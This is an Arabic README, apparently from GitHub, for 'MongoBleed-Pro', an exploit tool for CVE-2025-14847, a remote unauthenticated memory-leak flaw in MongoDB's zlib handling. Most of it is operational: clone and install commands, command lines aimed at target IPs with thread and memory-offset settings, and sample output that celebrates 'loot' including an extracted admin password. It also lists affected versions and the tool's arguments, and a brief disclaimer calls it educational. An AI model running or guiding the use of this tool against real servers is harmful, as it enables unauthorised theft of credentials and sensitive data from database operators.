
ثغرة حرجة لكشف تسرب الذاكرة في معالجة ضغط zlib في MongoDB. تتيح هذه الأداة لباحثي الأمن استخراج البيانات الحساسة من مثيلات MongoDB المعرضة للخطر.
أداة استغلال متقدمة لتسريب الذاكرة في MongoDB
واصل التعلم | واصل الاختراق مع CyberTechAjju
MongoBleed-Pro هي أداة استغلال متقدمة لثغرة CVE-2025-14847، وهي ثغرة حرجة لكشف الذاكرة في معالجة ضغط zlib في MongoDB. تتيح هذه الأداة لباحثي الأمن استخراج البيانات الحساسة من خوادم MongoDB المتأثرة.
هذه الأداة مخصصة لاختبارات الأمن المصرح بها والأغراض التعليمية فقط. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني. احرص دائمًا على الحصول على التصريح المناسب قبل الاختبار.
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit
# Install dependencies
pip install -r requirements.txt
python3 mongobleed_pro.py
python3 mongobleed_pro.py --target 192.168.1.100
python3 mongobleed_pro.py --target 192.168.1.100:27018
python3 mongobleed_pro.py --file targets.txt
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000
╔══════════════════════════════════════════════════════════════╗
║ 💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀 ║
╚══════════════════════════════════════════════════════════════╝
⚡ Target Acquired: 192.168.1.100:27017
✓ Port OPEN
☠️ VULNERABLE! Initiating attack...
◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
☠️ LOOT ACQUIRED: 🔐 Password
→ admin_pass=SuperSecret123
╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║ 💾 Bytes Extracted: 125,847
║ 📦 Unique Fragments: 342
║ 🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝
| الملف | الوصف |
|---|---|
loot_<host>.txt | الأسرار المستخرجة بصيغة قابلة للقراءة |
dump_<host>.bin | تفريغ خام للذاكرة للتحليل اليدوي |
إذا كنت مسؤولًا عن MongoDB، فقم بالتحديث إلى الإصدارات المصححة:
CyberTechAjju
هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.
إذا وجدت هذه الأداة مفيدة، فيرجى منحها ⭐ على GitHub!
「 واصل التعلم | واصل الاختراق 」
صُنع بـ ❤️ بواسطة CyberTechAjju
| الخاصية | التفاصيل |
|---|
| معرّف CVE | CVE-2025-14847 |
| نوع الثغرة | كشف الذاكرة |
| الإصدارات المتأثرة | MongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23 |
| السبب الجذري | قراءة تتجاوز حدود المخزن المؤقت في فك ضغط zlib |
| الأثر | تسريب ذاكرة عن بُعد بدون مصادقة |
| الوسيط | الوصف | الافتراضي |
|---|
--target | IP/URL الخاص بالهدف | موجه تفاعلي |
--file | ملف بقائمة الأهداف | لا شيء |
--threads | عدد الخيوط | 50 |
--min-offset | الحد الأدنى لإزاحة الذاكرة | 20 |
--max-offset | الحد الأقصى لإزاحة الذاكرة | 8192 |